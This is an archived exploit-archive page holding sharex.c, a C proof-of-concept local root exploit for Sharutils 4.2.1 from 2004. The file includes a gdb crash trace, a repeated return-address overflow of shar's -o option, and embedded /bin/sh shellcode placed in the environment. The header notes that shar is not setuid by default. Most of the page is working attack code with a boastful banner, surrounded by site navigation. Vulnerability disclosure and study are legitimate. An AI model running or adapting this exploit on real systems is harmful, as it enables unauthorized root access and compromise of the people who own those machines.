sharex.c

sharex.c: Posted Jul 18, 2004; Authored by Adam Simuntis aka n30n | Site n30n.byte-lab.com; Sharutils 4.2.1 local root exploit. Note: shar is NOT setuid by default, so this exploit is completely proof of concept if for some reason the binary was setuid.; tags | exploit, local, root, proof of concept; SHA-256 | edd1020fd999d8177e094173be570e3a68f63ad358f7757f48ef91abc923b842; Download | Favorite | View

sharex.c

/* -------------------------------------------
/* Sharutils 4.2.1 local root exploit by n30n.
/* http://n30n.byte-lab.com 
/* n30n[at]satfilm[dot]net[dot]pl
/* -------------------------------------------
/* Posted in bugtraq by Shaun Colley. 
/* http://securityfocus.com/archive/1/359639
/* -------------------------------------------
/* Vulnerable versions <= 4.2.1 of Sharutils
/* n30n@orion:~$ ls -l /usr/local/bin/shar
/* -rwsr-sr-x  1 root root 123726 2004-07-17 21:03 /usr/local/bin/shar*
/* -----
/* (gdb) r -o`perl -e 'print "N"x500;'`
/* Starting program: /usr/local/bin/shar -o`perl -e 'print "N"x500;'`
/*
/* Program received signal SIGSEGV, Segmentation fault.
/* 0x4e4e4e4e in ?? ()
/* (gdb) info reg eip 
/* eip            0x4e4e4e4e       0x4e4e4e4e
/* ----------------------------------------------------------------- */


#include <stdlib.h>
#include <string.h>

#define PATH "/usr/local/bin/shar" /* You can change this */
#define BUFFER 500

char code[]=
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd" /* Set real and effective user id & execve.*/
"\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07"
"\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d"
"\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";



int banner(){
    printf("\n\t-----------------------------------------------\n");
    printf("\t-> Sharutils 4.2.1 local root exploit by n30n.\n");
    printf("\t-> http://n30n.byte-lab.com\n");
    printf("\t-> EDUCATIONAL PRUPOSES ONLY.\n");
    printf("\t-----------------------------------------------\n");
    return 0;
}

int main(int argc, char *argv[]){
    int i,offset;
    long ret, *buf_addr;
    char *buffz,*path=PATH;
    static char *env[2]={code,NULL};          

    banner();
    offset = 0;
    buffz = malloc(BUFFER);
    ret = 0xbffffffa - strlen(code) - strlen(path);
    printf("\n\tEnjoy your uid :)\n\n");
    ret+=offset;
  buf_addr=(long*)buffz;
    for(i = 0; i < BUFFER; i+=4){
  *(buf_addr) = ret;
  buf_addr++;
    }
    
    execle(path,path,"-o",buffz,NULL, env);
    free(buffz);

    return 0;

}

Top Authors In Last 30 Days

Red Hat 219 files
indoushka 83 files
Ubuntu 79 files
Gentoo 36 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,707)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,485)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,737)
UNIX (9,435)
UnixWare (187)
Windows (6,672)
Other

sharex.c

sharex.c

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

sharex.c

Share This

sharex.c

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems